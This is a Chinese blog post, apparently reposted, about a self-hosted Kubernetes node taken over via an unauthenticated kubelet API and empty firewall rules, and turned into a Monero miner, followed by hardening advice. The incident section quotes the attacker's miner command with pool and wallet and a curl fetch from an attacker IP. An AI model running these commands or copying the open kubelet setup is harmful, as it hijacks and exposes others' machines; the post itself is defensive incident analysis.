性能文章>一次Kubernetes 集群被入侵,服务器变矿机>

一次Kubernetes 集群被入侵,服务器变矿机转载

177501

导读

近期遇到了一次我们自建 Kubernetes 集群中某台机器被入侵挖矿,后续也找到了原因,所幸只是用来挖矿…
网络安全是个严肃的问题,它总是在不经意间出现,等你反应过来却已经迟了。希望各位读者看完后也有所启发,去检查及加固自己的集群。


入侵现象

检查到某台机器中出现了异常进程

./.system -o pool.supportxmr.com:3333 --donate-level=1 --coin=monero -u 46EPFzvnX5GH61ejkPpNcRNm8kVjs8oHS9VwCkKRCrJX27XEW2y1NPLfSa54DGHxqnKfzDUVW1jzBfekk3hrCVCm
curl -s http://45.9.148.35/scan_threads.dat

一次Kubernetes 集群被入侵,服务器变矿机数据图表-heapdump性能社区

简单来讲,就是我们的机器被用来挖矿了…

问题出现后,我们第一时间关闭了docker,其实应该隔离下环境, 把挖矿程序dump下来,以便后续分析。

具体原因排查

iptables为空

出现了异常进程,肯定是被入侵了,我首先看的是 iptables 。果不其然,机器上的 iptables 规则是空的,意味着这台机器在裸奔。

kubelet裸奔

内部同事提出了有可能是 kubelet 被入侵的问题,检查过其他组件后,开始检查 kubelet 组件

最后检查到 kubelet 日志中有异常:

一次Kubernetes 集群被入侵,服务器变矿机数据图表-heapdump性能社区

kubelet设置不当

确认入侵问题,kubelet 参数设置错误,允许直接访问 kubelet 的 api

一次Kubernetes 集群被入侵,服务器变矿机数据图表-heapdump性能社区

发现是 kubelet 的启动项中,该位置被注释掉:

一次Kubernetes 集群被入侵,服务器变矿机数据图表-heapdump性能社区

然后文件中禁止匿名访问的配置没有读取

一次Kubernetes 集群被入侵,服务器变矿机数据图表-heapdump性能社区

该项配置是由于**作不当注释掉的

由于是新增加的机器,当晚就发现了问题,整个集群是我在管理的,我跟随着一起排查,所以很快就找到了原因,当晚我就把其他机器中的配置项重新扫了一遍,假如它们的防火墙失效了,也会有类似的入侵情况发生,还好此次事件控制在1台机器中。


改进方案

其实该问题理论上讲是可以避免的,是因为出现了多层漏洞才会被有心人扫到,我从外到内整理了一下可能改进的策略。

机器防火墙设置,机器防火墙是整个系统最外层,即使机器的防火墙同步失败,也不能默认开放所有端口,而是应该全部关闭,等待管理员连接到tty终端上检查。


使用机器时,假如机器不是暴露给外部使用的,公网IP可有可无的时候,尽量不要有公网IP,我们的机器才上线1天就被扫描到了漏洞,可想而知,公网上是多么的危险使用kubelet以及其他系统服务时,端口监听方面是不是该有所考量?能不能不监听 0.0.0.0,而是只监听本机的内网IP。


使用kubelet以及其他程序,设计或是搭建系统时, 对于匿名访问时的权限控制, 我们需要考虑到假如端口匿名会出现什么问题,是否应该允许匿名访问,如果不允许匿名访问,那么怎么做一套鉴权系统?


系统管理员操作时,是否有一个比较规范化的流程,是不是该只使用脚本操作线上环境? 手动操作线上环境带来的问题并不好排查和定位。


我这里不是抛出疑问,只是想告诉大家,考虑系统设计时,有必要考虑下安全性。


总结

发生了入侵事件后,同事开玩笑说,还好没其他经济损失,要不我可能要回家了。作为集群的管理员,只有自己最清楚问题的严重程度。从本质上来讲,问题已经相当严重了。入侵者相当于拥有了机器上docker的完整控制权限。如果读者有读过我关于docker系列的内容,就对权限上了解清楚了。


因为此次事件的发生,不只是我,还有SA的同学基本都被diao了一遍,心里还是有点难受的,希望大家能对网络安全问题有所重视,从加固防火墙开始,避免监听不必要的端口,这两项至少是最容易实现的。

 

更多思考

关于Kubernetes的内容,大家可以阅读以下内容完成进阶学习

为什么容器内存占用居高不下,频频 OOM

分类:
标签:
请先登录,再评论

暂无回复,快来写下第一个回复吧~

为你推荐

关于内存溢出,咱再聊点有意思的?
概述 上篇文章讲了JVM在GC上的一个设计缺陷,揪出一个导致GC慢慢变长的JVM设计缺陷,可能有不少人还是没怎么看明白的,今天准备讲的大家应该都很容易看明白 本文其实很犹豫写不写,因为感觉没有
又发现一个导致JVM物理内存消耗大的Bug(已提交Patch)
概述 最近我们公司在帮一个客户查一个JVM的问题(JDK1.8.0_191-b12),发现一个系统老是被OS Kill掉,是内存泄露导致的。在查的过程中,阴差阳错地发现了JVM另外的一个Bug。这个B
LONG究竟有多长,从皇帝的新衣到海康SDK
转眼之间初中毕业30年了,但我仍清楚的记得初中英语的一篇课文,题目叫《皇帝的新装》(“The king’s new clothes”)。这篇课文的前两句话是:”Long long ago, there
谨防JDK8重复类定义造成的内存泄漏
概述 如今JDK8成了主流,大家都紧锣密鼓地进行着升级,享受着JDK8带来的各种便利,然而有时候升级并没有那么顺利?比如说今天要说的这个问题。我们都知道JDK8在内存模型上最大的改变是,放弃了Perm
JVM垃圾回收与一次线上内存泄露问题分析和解决过程
本文转载自:花椒技术微信公众号 前言内存泄漏(Memory Leak)是指程序中己动态分配的堆内存由于某种原因程序未释放或无法释放,造成系统内存的浪费,导致程序运行速度减慢甚至系统崩溃等严重后果。Ja
为什么容器内存占用居高不下,频频 OOM
最近我在回顾思考(写 PPT),整理了现状,发现了这个问题存在多时,经过一番波折,最终确定了元凶和相对可行的解决方案,因此分享一下排查历程,希望能够给大家一些借鉴的经验。时间线:- 在上 Kubern
改善 Kubernetes 上的 JVM 预热问题
JVM 预热是一个非常头疼而又难解决的问题。本文讨论了在运行在 Kubernetes 集群中的 Java 服务如何解决 JVM 预热问题的一些方法和经验。 作者:Vikas Kumar 翻译:Bach
一次Kubernetes 集群被入侵,服务器变矿机
导读近期遇到了一次我们自建 Kubernetes 集群中某台机器被入侵挖矿,后续也找到了原因,所幸只是用来挖矿…网络安全是个严肃的问题,它总是在不经意间出现,等你反应过来却已经迟了。希望各位读者看完后也有所启发,去检查及加固自己的集群。入侵现象检查到某台机器中出现了异常进程./